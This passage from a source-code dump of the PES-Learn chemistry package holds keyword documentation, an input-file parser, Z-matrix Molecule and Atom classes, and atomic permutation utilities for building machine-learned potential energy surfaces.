* **Possible values**: scfenergies, mpenergies, ccenergies\n\n \n* `pes_dir_name` \n **Description:** The name of the directory containing all electronic structure theory package input and/or output files. Used both when generating and parsing data.\n * **Type**: string, surrounded by quotes\n * **Default**: 'PES_data'\n * **Possible values**: any string \n\n\n* `pes_format` \n **Description:** When parsing output file data, should PES-Learn create a dataset in terms of interatomic distances or user-supplied internal coordinates given by the Z-Matrix? 
\n * **Type**: string\n * **Default**: interatomics\n * **Possible values**: interatomics, zmat \n\n\n* `pes_name` \n **Description:** The name of the produced dataset after parsing output files from `pes_dir_name`, as well as the name of the dataset which will be read for building ML models.\n * **Type**: string, surrounded by quotes\n * **Default**: 'PES.dat'\n * **Possible values**: any string \n\n\n* `remove_redundancy` \n **Description:** Removes symmetry-redundant geometries from the internal coordinate grid \n * **Type**: bool\n * **Default**: true\n * **Possible values**: true, false\n \n \n* `remember_redundancy` \n **Description:** Remember symmetry-redundant geometries when they are removed using `remove_redundancy`. This is done so that redundant geometries can be included in the dataset created when parsing, each assigned the energy of its redundant partner whose energy was actually computed. These geometries are included when parsing only if `pes_redundancy` is set to true.\n * **Type**: bool\n * **Default**: false\n * **Possible values**: true, false\n\n\n* `pes_redundancy` \n **Description:** Include all redundant geometries and assign appropriate redundant energies when creating a dataset with parsing capability. Doesn't do anything unless `remember_redundancy` was set to true when data was generated.\n * **Type**: bool\n * **Default**: false\n * **Possible values**: true, false \n\n\n* `grid_reduction` \n **Description:** Reduce the size of the internal coordinate grid to _n_ points. Acts **after** redundancy removal. Analyzes Euclidean distances between all datapoints, and creates a sub-grid of *n* geometries which are maximally far apart from one another.\n * **Type**: int\n * **Default**: None\n * **Possible values**: any integer, less than the total number of points in the internal coordinate grid after redundancies are removed.\n \n \n* `eq_geom` \n **Description:** Forces this geometry (typically the equilibrium geometry) into the dataset. Internal coordinates are supplied in the order they appear in the Z-Matrix of the input file. \n * **Type**: list\n * **Default**: None\n * **Possible values**: `[1.0, 1.0, 104.5, 1.5, 120, 180]`, etc.\n \n\n* `sort_pes` \n **Description:** When parsing to produce a dataset, sort the energies in increasing order \n * **Type**: bool\n * **Default**: true\n * **Possible values**: true, false\n\n \n## Machine Learning Keywords\n\n* `ml_model` \n **Description:** Use Gaussian process regression or neural networks? \n * **Type**: string\n * **Default**: gp\n * **Possible values**: gp, nn\n \n\n* `use_pips` \n **Description:** Use the software's library of fundamental invariant polynomials to represent the interatomic distances dataset in terms of permutation invariant polynomials. Requires that the dataset is an interatomic distance dataset produced by PES-Learn, or a properly formatted Cartesian coordinate external dataset. \n * **Type**: bool\n * **Default**: true\n * **Possible values**: true, false\n\n\n* `sampling` \n **Description:** Training set sampling algorithm \n * **Type**: string\n * **Default**: structure_based\n * **Possible values**: structure_based, smart_random, random\n \n\n* `training_points` \n **Description:** Number of training points \n * **Type**: int\n * **Default**: 50\n * **Possible values**: any int smaller than total dataset size.\n \n* `validation_points` \n **Description:** Number of validation points. Currently only used for neural networks.\n * **Type**: int\n * **Default**: Random set of half the points remaining after setting aside the training set.\n * **Possible values**: Any positive integer smaller than (total dataset size - `training_points`).\n
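\nFor example, a training and validation split might be requested with (illustrative values only):\n\n```\nsampling = structure_based\ntraining_points = 800\nvalidation_points = 100\n```\n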
\n* `hp_maxit` \n **Description:** Maximum number of hyperparameter tuning iterations. \n * **Type**: int\n * **Default**: 20\n * **Possible values**: Any positive integer\n\n\n* `rseed` \n **Description:** Global random seed. Used for initializing hyperparameter optimization iterations and random training set sampling.\n * **Type**: int\n * **Default**: None\n * **Possible values**: Any integer\n\n\n* `gp_ard` \n **Description:** Use automatic relevance determination (ARD) in Gaussian process regression. If true, a length scale is optimized for each input dimension. If false, just one length scale is optimized. If gp_ard = opt, it is treated as a hyperparameter. False is typically better for high-dimensional inputs (>30).\n * **Type**: bool\n * **Default**: true\n * **Possible values**: true, false, or opt (treats as hyperparameter)\n\n\n* `nas_trial_layers` \n **Description:** Neural network hidden layer structures to try out during neural architecture search. A list of lists of numbers corresponding to the hidden layers and the number of nodes in each hidden layer. Must have at least 3 hidden layer structures. E.g. `[[16,16], [32], [64,64,64]]`\n * **Type**: List\n * **Default**: See `ml/neural_network.py`\n * **Possible values**: any list of lists of positive integers\n\n\n* `nn_precision` \n **Description:** Floating point precision for neural networks. 32 or 64 bit. For high precision use-cases, it is recommended to use 64 bit for stability and maximum fitting performance, though training is a little slower than 32 bit.\n * **Type**: int\n * **Default**: 32\n * **Possible values**: 32, 64\n" }, { "alpha_fraction": 0.8154981732368469, "alphanum_fraction": 0.8154981732368469, "avg_line_length": 29.11111068725586, "blob_id": "43e44fd89e1632f2f841e5992844a458b903ba2d", "content_id": "bc3a5c08222f749410845720949bfb5d9d15c192", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 271, "license_type": "permissive", "max_line_length": 45, "num_lines": 9, "path": "/peslearn/ml/__init__.py", "repo_name": "zero0911/PES-Learn", "src_encoding": "UTF-8", "text": "from . import data_sampler\nfrom . import gaussian_process\nfrom . import neural_network \nfrom . import preprocessing_helper \nfrom . 
import model\n\nfrom .gaussian_process import GaussianProcess\nfrom .data_sampler import DataSampler\nfrom .neural_network import NeuralNetwork\n" }, { "alpha_fraction": 0.4896324872970581, "alphanum_fraction": 0.4959245026111603, "avg_line_length": 56.31147384643555, "blob_id": "c65026af505f4608e0217d70240f380547226557", "content_id": "47bd0f09b16d96bc761d4cf9858a6b87d9a43ad5", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6993, "license_type": "permissive", "max_line_length": 176, "num_lines": 122, "path": "/peslearn/input_processor.py", "repo_name": "zero0911/PES-Learn", "src_encoding": "UTF-8", "text": "\"\"\"\nA class for extracting information from the main input of the user\n\"\"\"\n\nfrom .utils import regex \nfrom .datagen import molecule\nimport re\nimport collections\nimport numpy as np\nimport itertools as it\nimport timeit\nimport ast\n\nclass InputProcessor(object):\n \"\"\"\n A class which handles the information contained within an input file\n \"\"\"\n def __init__(self, input_string):\n # Remove all comments denoted by '#'\n self.full_string = re.sub('\s*#.+', '', input_string)\n regex_number = regex.intcoords_regex\n if re.search(regex_number, self.full_string):\n self.zmat_string = re.findall(regex.intcoords_regex, self.full_string)[0] \n self.intcos_ranges = None \n self.keywords = self.get_keywords()\n self.ndisps = None\n \n def set_keyword(self, d):\n for key, val in d.items():\n self.keywords[key] = val\n \n def get_keywords(self):\n \"\"\"\n Find keyword definitions within the input file\n \"\"\"\n # keywords which have values that are strings, not other datatypes\n regex_keywords = {'energy_regex': None, 'gradient_header': None, 'gradient_footer': None, \n 'gradient_line': None, 'input_name': 'input.dat', 'output_name': 'output.dat', 'pes_dir_name': 'PES_data', 'pes_name': 'PES.dat'}\n string_keywords = {'energy': None, # parse energies with 'cclib', 'regex'\n 'energy_regex': None, # a regular expression string, surrounded by '' or \"\"\n 'energy_cclib': None, # a cclib energy option. 'scfenergies', 'mpenergies', 'ccenergies'\n 'gradient': None, # parse gradients with 'cclib', 'regex'\n 'gradient_header': None, # gradient header regular expression string\n 'gradient_footer': None, # gradient footer regular expression string\n 'gradient_line': None, # regular expression string for one line of the cartesian gradient\n 'input_name': 'input.dat', # what to call new input files generated from template, can be any name\n 'output_name': 'output.dat', # the name of electronic structure theory output files corresponding to input_name\n 'ml_model': 'gp', # 'gp', 'nn'\n 'mode': None, # 'generate', 'parse', 'learn', or shorthand: 'g', 'p', 'l'\n 'pes_name': 'PES.dat', # any name\n 'pes_dir_name': 'PES_data', # any name\n 'pes_redundancy': 'false', # 'true'\n 'pes_format': 'interatomics', # 'zmat'\n 'remove_redundancy': 'true', # 'false'\n 'remember_redundancy' : 'false', # 'true'\n 'grid_reduction' : None, # any int\n 'eq_geom' : None, #[1.05, 1.15, 104.5] etc\n 'use_pips': 'true', #'false'\n 'sort_pes': 'true', #'false'\n 'sampling': 'structure_based', # 'structure_based','sobol', 'smart_random', 'random', 'energy_ordered'\n 'n_low_energy_train': 0, # any int\n 'training_points': None, # any int\n 'validation_points': None, # any int\n 'hp_maxit': 20, # any int\n 'rseed': None, # any int\n 'gp_ard': 'true', # 'true', 'false'. 'opt' treats as hyperparameter\n 'nas_trial_layers': None, # List of lists e.g. 
[[10,], [10,10,10], [50,50]]\n 'nn_precision': 32, # neural network floating point precision 32 or 64\n 'hp_opt': 'true'} # 'false'\n\n for k in string_keywords:\n match = re.search(k+\"\s*=\s*(.+)\", self.full_string)\n # if the keyword is mentioned\n if match:\n value = str(match.group(1))\n # if not a regex, remove spaces and make lower case \n # for later boolean checks on keywords\n if k not in regex_keywords:\n value = value.lower().strip()\n # if keyword is raw text, add quotes so it is a string\n if re.match(\"[a-z\_]+\", value):\n # only add quotes if the value is not already quoted\n if (r\"'\" not in value) and (r'\"' not in value):\n value = \"\".join((r'\"',value,r'\"',))\n try:\n # evaluate the value as a Python literal (int, list, quoted string, ...)\n value = ast.literal_eval(value)\n string_keywords[k] = value\n except:\n raise Exception(\"\\n'{}' is not a valid option for {}. Entry should be plain text or a string, i.e., surrounded by single or double quotes.\".format(value,k))\n return string_keywords\n \n\n def extract_intcos_ranges(self):\n \"\"\"\n Find internal coordinate range definitions within the input file\n \"\"\"\n # create molecule object to obtain coordinate labels\n self.zmat_string = re.findall(regex.intcoords_regex, self.full_string)[0] \n self.mol = molecule.Molecule(self.zmat_string)\n geomlabels = self.mol.geom_parameters \n ranges = collections.OrderedDict()\n # for every geometry label look for its range identifier, e.g. R1 = [0.5, 1.2, 25]\n for label in geomlabels:\n # check to make sure parameter isn't defined more than once\n if len(re.findall(\"\W\" + label+\"\s*=\s*\", self.full_string)) > 1:\n raise Exception(\"Parameter {} defined more than once.\".format(label))\n\n # if geom parameter has a geometry range, save it\n match = re.search(label+\"\s*=\s*(\[.+\])\", self.full_string)\n if match:\n try:\n ranges[label] = ast.literal_eval(match.group(1))\n except: \n raise Exception(\"Something wrong with definition of parameter {} in input. Should be of the form [start, stop, # of points] or a fixed value\".format(label))\n # if it has a fixed value, save it\n else:\n match = re.search(label+\"\s*=\s*(-?\d+\.?\d*)\", self.full_string)\n if not match:\n raise Exception(\"\\nDefinition of parameter {} not found in geometry input. \\\n \\nThe definition is either missing or improperly formatted\".format(label))\n ranges[label] = [float(match.group(1))]\n self.intcos_ranges = ranges\n\n" }, { "alpha_fraction": 0.5703391432762146, "alphanum_fraction": 0.5819405913352966, "avg_line_length": 46.39615249633789, "blob_id": "5d62c9ebb1d14ac69b6478a8a190ae30f8ad9070", "content_id": "be9c5455ebcb5a7eea69747703e6da5b6727294c", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 12326, "license_type": "permissive", "max_line_length": 145, "num_lines": 260, "path": "/peslearn/datagen/molecule.py", "repo_name": "zero0911/PES-Learn", "src_encoding": "UTF-8", "text": "from .. 
import constants\nfrom ..utils import regex\nfrom ..utils import geometry_transform_helper as gth \nimport re\nimport math\nimport numpy as np\nimport collections\n\n\"\"\"\nContains Atom and Molecule classes for reading, saving and editing the geometry of a molecule \nBuilt around reading internal coordinates \n\"\"\"\n\nclass Atom(object):\n \"\"\"\n The Atom class holds information about the geometry of an atom\n\n Parameters\n ----------\n label : str\n The atomic symbol\n r_idx : str\n The bond connectivity index, as represented in a Z-matrix\n a_idx : str\n The angle connectivity index, as represented in a Z-matrix\n d_idx : str\n The dihedral connectivity index, as represented in a Z-matrix\n intcoords : dict\n A dictionary of geometry parameter labels (e.g. \"R1\") and the value for this atom\n coords : array\n An array of cartesian coordinates for this atom\n \"\"\"\n def __init__(self, label, r_idx=None, a_idx=None, d_idx=None, intcoords=None):\n self.label = label\n self.r_idx = r_idx\n self.a_idx = a_idx\n self.d_idx = d_idx\n # avoid sharing a mutable default argument across Atom instances\n self.intcoords = intcoords if intcoords is not None else collections.OrderedDict()\n self.update_intcoords()\n self.coords = np.array([None, None, None]) \n \n def update_intcoords(self):\n self.geom_vals = list(self.intcoords.values())\n while len(self.geom_vals) < 3:\n self.geom_vals.append(None)\n self.rval = self.geom_vals[0]\n self.aval = self.geom_vals[1]\n self.dval = self.geom_vals[2]\n\n \nclass Molecule(object):\n \"\"\"\n The Molecule class holds geometry information about all the atoms in the molecule\n Requires initialization with a file string containing internal coordinates\n\n Parameters\n ----------\n zmat_string : str\n A standard Z-Matrix defining internal coordinates. Defining within a multiline string as one would \n when using an electronic structure package is recommended. Example:\n '''\n O\n H 1 r1\n H 1 r2 2 a1\n '''\n\n Dummy atoms can be specified with 'X', and one can force coordinates to be identical:\n '''\n C\n X 1 RDUM\n H 1 R 2 A\n H 1 R 2 A 3 D120\n H 1 R 2 A 4 D120\n '''\n \"\"\"\n def __init__(self, zmat_string):\n self.zmat_string = zmat_string\n self.extract_zmat(self.zmat_string)\n \n \n def extract_zmat(self, zmat_string):\n \"\"\"\n This should maybe just be in the init method.\n Take the string which contains an isolated Z matrix definition block,\n and extract information and save the following attributes:\n self.n_atoms - the number of atoms in the molecule (including dummy)\n self.n_dummy - the number of dummy atoms\n self.zmat_indices - connectivity indices in Z-Matrix in the order they appear\n self.atom_labels - a list of element labels 'H', 'O', etc., including dummy atoms\n self.real_atom_labels - a list of element labels exluding dummy atoms\n self.geom_parameters - a list of geometry labels in the order they appear \n in the supplied Z matrix 'R3', 'A2', etc.\n self.unique_geom_parameters - a list of unique geometry labels in the order they appear\n in the supplied Z matrix\n self.atoms - a list of Atom objects containing complete Z matrix information for each Atom\n self.atomtype_dict - a dictionary of atom labels and the number of that atom, sorted by number of occurrences \n self.sorted_atom_counts - a list of tuples, ('atom_label', number of occurrences) sorted by highest number of occurrences \n self.atom_count_vector - a list of the number of each atom. 
Length is number of unique atoms, each value is the number \n of a particular atom, sorted in the same way as self.sorted_atom_counts\n self.std_order_atoms - a list of Atom objects in the order according to sorted_atom_counts\n self.std_order_atom_labels - a list of atom element labels in standard order\n self.std_order_permutation_vector - a list of indices required to permute given atom order to standard order \n (most common elements first, alphabetical tiebreaker), AND omit dummy atoms\n self.std_order_bond_types - a list of bond types (HC, OH, etc) in standard order of interatomic distances\n self.alpha_bond_types - a list of bond types in alphabetical order\n self.alpha_bond_types_indices - a list of the indices that would make the std_order_bond_types alphabetical\n self.alpha_bond_types_first_occur_indices - the index of the first occurrence of each new bond type in the alphabetical bond types lists. \n Used for subset sorting within bond types.\n self.interatomic_labels - a list of interatomic distance labels\n self.molecule_type - a string with a generic molecule type label, A2BC, A2B6, etc.\n \"\"\"\n # grab array-like representation of zmatrix and count the number of atoms \n zmat_array = [line.split() for line in zmat_string.splitlines() if line]\n self.n_atoms = len(zmat_array)\n\n tmp = list(np.concatenate([i[1::2] for i in zmat_array]))\n self.zmat_indices = np.array([int(i) for i in tmp])\n\n # find geometry parameter labels \n # atom labels will always be at index 0, 1, 3, and every 4th index after 6 (6, 10, 14, ...) \n # and geometry parameters are all other matches\n tmp = re.findall(regex.coord_label, zmat_string)\n self.atom_labels = []\n for i, s in enumerate(tmp):\n if (i == 0) or (i == 1) or (i == 3):\n self.atom_labels.append(tmp[i])\n if ((i >= 6) and ((i-6) % 4 == 0)):\n self.atom_labels.append(tmp[i])\n\n self.n_dummy = len([x for x in self.atom_labels if x.lower() == 'x'])\n self.real_atom_labels = [x for x in self.atom_labels if x.lower() != 'x']\n\n self.geom_parameters = [x for x in tmp if x not in self.atom_labels]\n self.unique_geom_parameters = list(collections.OrderedDict.fromkeys(self.geom_parameters))\n\n self.atoms = []\n for i in range(self.n_atoms):\n label = zmat_array[i][0]\n intcoords = collections.OrderedDict()\n r_idx, a_idx, d_idx = None, None, None\n if (i >= 1):\n r_idx = int(zmat_array[i][1]) - 1\n intcoords[zmat_array[i][2]] = None\n if (i >= 2):\n a_idx = int(zmat_array[i][3]) - 1\n intcoords[zmat_array[i][4]] = None\n if (i >= 3):\n d_idx = int(zmat_array[i][5]) - 1\n intcoords[zmat_array[i][6]] = None\n self.atoms.append(Atom(label, r_idx, a_idx, d_idx, intcoords))\n\n # get standard order atomtypes and atomtype_vector \n self.sorted_atom_counts = collections.Counter(self.real_atom_labels).most_common()\n # sort first by occurrences in decreasing order, then alphabetically\n self.sorted_atom_counts = sorted(self.sorted_atom_counts, key = lambda x: (-x[1], x[0]))\n self.atom_count_vector = [val[1] for val in self.sorted_atom_counts] \n\n self.std_order_atoms = []\n for tup in self.sorted_atom_counts:\n for atom in self.atoms:\n if atom.label == tup[0]:\n self.std_order_atoms.append(atom)\n\n self.std_order_atom_labels = [atom.label for atom in self.std_order_atoms]\n\n # Find permutation vector to permute given atom order to standard order (most common elements first, \n # alphabetical tiebreaker), and omit dummy atoms\n std_order_permutation_vector = []\n tmp_atom_labels = self.atom_labels.copy()\n for i,j in enumerate(self.std_order_atom_labels):\n for k,l in enumerate(tmp_atom_labels):\n if j == l:\n std_order_permutation_vector.append(k)\n tmp_atom_labels[k] = 'done'\n continue\n self.std_order_permutation_vector = np.array(std_order_permutation_vector)\n
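 # Illustrative example (comment added; not in the original source): for a Z-Matrix given\n # in the order O, H, H, the standard order is H, H, O, so this vector is [1, 2, 0].\n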
\n l = len(self.std_order_atom_labels)\n tmp = np.empty((l,l),dtype=object)\n for i in range(l):\n for j in range(l):\n tmp[i,j] = ''.join(sorted(self.std_order_atom_labels[i] + self.std_order_atom_labels[j]))\n tmp2 = tmp[np.tril_indices(len(tmp), -1)]\n self.std_order_bond_types = list(tmp2)\n self.alpha_bond_types = np.sort(tmp2)\n # allows re-sorting bond distances in the dataframe to bond-type order with fancy indexing\n self.alpha_bond_types_indices = np.argsort(tmp2) \n \n self.alpha_bond_types_first_occur_indices = [0]\n previous = None\n for i,l in enumerate(self.alpha_bond_types):\n if i>0:\n if l != previous:\n self.alpha_bond_types_first_occur_indices.append(i) \n previous = l\n \n \n\n n_interatomics = int(0.5 * (self.n_atoms * self.n_atoms - self.n_atoms))\n self.interatomic_labels = []\n for i in range(n_interatomics):\n self.interatomic_labels.append(\"r%d\" % (i))\n \n # define molecule type, A2BC, A2B3C2... etc\n letters = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L']\n self.molecule_type = ''\n for i, a in enumerate(self.atom_count_vector):\n self.molecule_type += letters[i]\n if a > 1:\n self.molecule_type += str(a)\n\n def update_intcoords(self, disp):\n \"\"\"\n Disp is a dictionary of geometry parameters and their new values, in angstrom and degrees\n {'R1': 1.01, 'R2':2.01, 'A1':104.5 ...}\n \"\"\"\n for key in disp:\n for atom in self.atoms:\n if key in atom.intcoords:\n atom.intcoords[key] = disp[key]\n # update Atom variables since intcoords may have changed; some redundancy here\n for atom in self.atoms:\n atom.update_intcoords()\n\n def zmat2xyz(self):\n \"\"\"\n Deprecated in favor of utils.geometry_transform_helper.vectorized_zmat2xyz()\n\n Converts Z-matrix representation to cartesian coordinates\n Changes element ordering to be the most common atom to least common atom\n Assumes Z-matrix is using degrees\n \"\"\"\n if (self.n_atoms >= 1):\n self.atoms[0].coords = np.array([0.0, 0.0, 0.0])\n if (self.n_atoms >= 2):\n self.atoms[1].coords = np.array([0.0, 0.0, self.atoms[1].rval])\n if (self.n_atoms >= 3):\n r1, r2 = self.atoms[1].rval, self.atoms[2].rval\n rn1, rn2 = self.atoms[1].r_idx, self.atoms[2].r_idx\n a1 = self.atoms[2].aval * constants.deg2rad \n y = r2*math.sin(a1)\n z = self.atoms[rn2].coords[2] + (1-2*float(rn2==1))*r2*math.cos(a1)\n self.atoms[2].coords = np.array([0.0, y, z])\n for i in range(3, self.n_atoms):\n atom = self.atoms[i]\n coords1 = self.atoms[atom.r_idx].coords\n coords2 = self.atoms[atom.a_idx].coords\n coords3 = self.atoms[atom.d_idx].coords\n self.atoms[i].local_axes = gth.get_local_axes(coords1, coords2, coords3)\n bond_vector = gth.get_bond_vector(atom.rval, atom.aval * constants.deg2rad, atom.dval * constants.deg2rad)\n disp_vector = np.array(np.dot(bond_vector, self.atoms[i].local_axes))\n for p in range(3):\n atom.coords[p] = self.atoms[atom.r_idx].coords[p] + disp_vector[p]\n\n # get cartesians in \"standard order\", i.e. give coordinates of most common occurring atom first (e.g. 
H H H C C O )\n # omit dummy atoms in cartesians\n cartesian_coordinates = [atom.coords for atom in self.std_order_atoms if atom.label != 'X']\n return np.array(cartesian_coordinates)\n\n \n" }, { "alpha_fraction": 0.25515463948249817, "alphanum_fraction": 0.25515463948249817, "avg_line_length": 41.77777862548828, "blob_id": "93df9688cefc7896286cd0dc81b835bfb1407ffd9", "content_id": "c2a6146dc2b65c2f4eef692b5f1efc5ab44cb518", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 388, "license_type": "permissive", "max_line_length": 66, "num_lines": 9, "path": "/peslearn/utils/printing_helper.py", "repo_name": "zero0911/PES-Learn", "src_encoding": "UTF-8", "text": "\n\n\ndef hyperopt_init():\n pass\n\ndef hyperopt_complete():\n print(\"\\n###################################################\")\n print(\"# #\")\n print(\"# Hyperparameter Optimization Complete!!! #\")\n print(\"# #\")\n print(\"###################################################\\n\")\n" }, { "alpha_fraction": 0.599216103553772, "alphanum_fraction": 0.614669680595398, "avg_line_length": 34.288536071777344, "blob_id": "e8e70ffb58a6332803e3ba072d0564fb01bcb707", "content_id": "56e3dd65493b7753b640f9b04b29c6df31cc40d9", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8930, "license_type": "permissive", "max_line_length": 141, "num_lines": 253, "path": "/peslearn/utils/permutation_helper.py", "repo_name": "zero0911/PES-Learn", "src_encoding": "UTF-8", "text": "import numpy as np\nimport itertools as it\nimport copy\n\ndef generate_permutations(k):\n \"\"\"\n Generates a list of lists of all possible orderings of k indices\n\n Parameters\n ----------\n k : int\n The number of elements in a permutation group. \n\n Returns\n ---------\n permutations : list\n A list of all possible permutations of the set {0, 1, ..., k-1}\n \"\"\"\n permutations = []\n for perm in (it.permutations(range(k))):\n permutations.append(list(perm))\n return permutations\n\n\ndef find_cycles(perm):\n \"\"\"\n Finds every possible cycle which results in the given permutation\n\n Parameters\n ----------\n perm : list\n Some permutation vector\n\n Returns\n ----------\n cycles : list\n A list of cycles (permutation operations)\n\n Example\n -------\n the permutation [3,1,2] is obtained by permuting [1,2,3] with the cycle [1,2,3]\n read as \"1 goes to 2, 2 goes to 3, 3 goes to 1\".\n Sometimes cycles are products of more than one subcycle, e.g. (12)(34)(5678)\n \"\"\"\n
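 # Illustrative check (comment added; not in the original source):\n # find_cycles([1, 2, 0]) returns [[0, 2, 1]], i.e. the single cycle 0 -> 2, 2 -> 1, 1 -> 0.\n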
(12)(34)(5678)\n \"\"\"\n pi = {i: perm[i] for i in range(len(perm))}\n cycles = []\n\n while pi:\n elem0 = next(iter(pi)) # arbitrary starting element\n this_elem = pi[elem0]\n next_item = pi[this_elem]\n\n cycle = []\n while True:\n cycle.append(this_elem)\n del pi[this_elem]\n this_elem = next_item\n if next_item in pi:\n next_item = pi[next_item]\n else:\n break\n cycles.append(cycle[::-1])\n\n # only save cycles of size 2 and larger\n cycles[:] = [cyc for cyc in cycles if len(cyc) > 1]\n return cycles\n\n\ndef generate_bond_indices(natoms):\n \"\"\"\n Finds the array of bond indices of an interatomic distance matrix, in row wise order:\n [[0,1], [0,2], [1,2], [0,3], [1,3], [2,3], ..., [0, natoms], [1, natoms], ...,[natoms-1, natoms]]\n \n Parameters\n ----------\n natoms: int\n The number of atoms\n\n Returns\n ----------\n bond_indices : list\n A list of lists, where each sublist is the subscripts of an interatomic distance\n from an interatomic distance matrix representation of a molecular system.\n e.g. r_12, r_01, r_05 \n \"\"\"\n # initialize j as the number of atoms\n j = natoms - 1\n # now loop backward until you generate all bond indices \n bond_indices = []\n while j > 0:\n i = j - 1\n while i >= 0:\n new = [i, j]\n bond_indices.insert(0, new)\n i -= 1\n j -= 1\n return bond_indices\n\ndef molecular_cycles(atomtype_vector):\n \"\"\"\n Finds the complete set of cycles that may act on a molecular system.\n Given an atomtype vector, containing the number of each atom:\n 1. generate the permutations of each atom\n 2. generate the cycles of each atom\n 3. adjust the indices to be nonoverlapping, so that each atom has a unique set of indices.\n For example, For an A2BC system, the indices may be assigned as follows: A 0,1; B 2; C 3; \n while the methods generate_permutations and find_cycles index from 0 for every atom, so we adjust the indices of every atom appropriately\n \n Parameters \n ---------\n atomtype_vector : list\n A list of the number of each atom in a molecular system, e.g., for an A2BC system, \n atomtype_vector would be [2,1,1].\n \n Returns\n --------\n cycles_by_atom : list\n The cycle permutation operators which act on each atom. 
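\n        As a hand-worked sketch (checked by hand, not captured program output): molecular_cycles([2, 1]) for an A2B system should give [[[[0, 1]]], []] -- the two like atoms contribute the single swap cycle [0, 1], and the lone atom contributes no cycles.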
\n    \"\"\"\n    permutations_by_atom = []\n    for atom in atomtype_vector:\n        # add the set of permutations for each atom type to permutations_by_atom\n        permutations_by_atom.append(generate_permutations(atom)) # an array of permutations is added for atom type X\n    cycles_by_atom = []\n    # each atom has a set of permutations, saved in permutations_by_atom \n    for i, perms in enumerate(permutations_by_atom):\n        cycles = []\n        # find the cycles of each permutation and append to cycles, then append cycles to cycles_by_atom\n        for perm in perms:\n            cyc = find_cycles(perm)\n            if cyc: # don't add empty cycles (identity permutation)\n                cycles.append(cyc)\n        cycles_by_atom.append(cycles)\n    # now update the indices of the second atom through the last atom since they are currently indexed from zero\n    # to do this we need to know the number of previous atoms, num_prev_atoms\n    atomidx = 0\n    num_prev_atoms = 0\n    for atom in cycles_by_atom[1:]:\n        num_prev_atoms += atomtype_vector[atomidx]\n        for cycle in atom:\n            for subcycle in cycle: # some cycles are composed of two or more subcycles (12)(34) etc.\n                for i, idx in enumerate(subcycle):\n                    subcycle[i] = idx + num_prev_atoms\n        atomidx += 1\n    return cycles_by_atom\n\ndef permute_bond(bond, cycle):\n    \"\"\"\n    Permutes a bond index if that index is affected by the permutation cycle.\n\n    Parameters\n    ----------\n    bond : list\n        A list of length 2, a subscript of an interatomic distance\n    cycle : list\n        A cycle-notation permutation operation.\n\n    Returns\n    -------\n    bond : the permuted bond\n    \"\"\"\n    count0 = 0\n    count1 = 0\n    # if a bond index matches the cycle index, set the bond index equal to the next index in the cycle\n    # we count so we don't change a bond index more than once.\n    # If the cycle index is at the end of the list, the bond index should wrap around to the first element of the list, since that is how cycles work.\n    # there is probably a cleaner way to wrap back around to the beginning of a list\n    for i, idx in enumerate(cycle):\n        if (bond[0] == idx) and (count0 == 0):\n            try:\n                bond[0] = cycle[i+1]\n            except:\n                bond[0] = cycle[0]\n            count0 += 1\n\n        if (bond[1] == idx) and (count1 == 0):\n            try:\n                bond[1] = cycle[i+1]\n            except:\n                bond[1] = cycle[0]\n            count1 += 1\n    # sort, in case the permutation disrupted the index order (e.g., a cycle may turn [1, 2] into [2, 1])
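\n    # A hand-worked sketch (checked by hand, not captured program output): permute_bond([0, 2], [0, 1]) maps index 0 -> 1 and returns the sorted bond [1, 2]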
\n    bond.sort()\n    return bond\n\n\ndef permute_bond_indices(atomtype_vector):\n    \"\"\"\n    Permutes the set of bond indices of a molecule according to the complete set of \n    valid molecular permutation cycles.\n\n    Parameters\n    ----------\n    atomtype_vector : list\n        A list of the number of each atom in a molecular system, e.g., for an A3B8C system, \n        atomtype_vector would be [3,8,1].\n\n    Returns\n    --------\n    bond_indice_permutations: list\n        A list of all possible bond index permutations of the interatomic distances. \n        The length is equal to the number of atomic permutations.\n    \"\"\"\n    natoms = sum(atomtype_vector)\n    bond_indices = generate_bond_indices(natoms)\n    cycles_by_atom = molecular_cycles(atomtype_vector)\n\n    bond_indice_permutations = [] # interatomic distance matrix permutations\n    for atom in cycles_by_atom:\n        for cycle in atom:\n            tmp_bond_indices = copy.deepcopy(bond_indices) # need a deep copy, list of lists\n            for subcycle in cycle:\n                for i, bond in enumerate(tmp_bond_indices):\n                    tmp_bond_indices[i] = permute_bond(bond, subcycle)\n            bond_indice_permutations.append(tmp_bond_indices)\n    return bond_indice_permutations\n\ndef induced_permutations(atomtype_vector, bond_indice_permutations):\n    \"\"\"\n    Given the original bond indices list [[0,1],[0,2],[1,2]...] and a permutation of this bond indices \n    list (which is found by permute_bond_indices), find the permutation vector that maps the original \n    to the permuted list. Do this for all permutations of the bond indices list. \n    The result is the complete set of induced interatomic distance matrix permutations caused \n    by the molecular permutation cycles.\n\n    Parameters\n    ---------\n    atomtype_vector : list\n        A list of the number of each atom in a molecular system, e.g., for an A3B8C system, \n        atomtype_vector would be [3,8,1].\n    bond_indice_permutations: list\n        A list of all possible bond index permutations of the interatomic distances. \n        The length is equal to the number of atomic permutations.\n\n    Returns\n    ---------\n    induced_perms : list\n        The induced interatomic distance permutations caused by the atomic permutation operations. \n        In row-wise order of the interatomic distance matrix: [r01, r02, r12, r03, r13, r23...]\n    \"\"\"\n    natoms = sum(atomtype_vector)\n    bond_indices = generate_bond_indices(natoms)\n\n    induced_perms = []\n    for bip in bond_indice_permutations:\n        perm = []\n        for bond1 in bond_indices:\n            for i, bond2 in enumerate(bip):\n                if bond1 == bond2:\n                    perm.append(i)\n        # cycle = find_cycles(perm) \n        induced_perms.append(perm)\n    return induced_perms\n\n\n" }, { "alpha_fraction": 0.7647808194160461, "alphanum_fraction": 0.7711519002914429, "avg_line_length": 53.5, "blob_id": "ebfeaa6fc4b0a2131e6c9be6efaf6949e5c44a4f", "content_id": "da989262a347004c7269d0ceab054378ecbb8838", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3924, "license_type": "permissive", "max_line_length": 383, "num_lines": 72, "path": "/README.md", "repo_name": "zero0911/PES-Learn", "src_encoding": "UTF-8", "text": "# PES-Learn\n[![Build 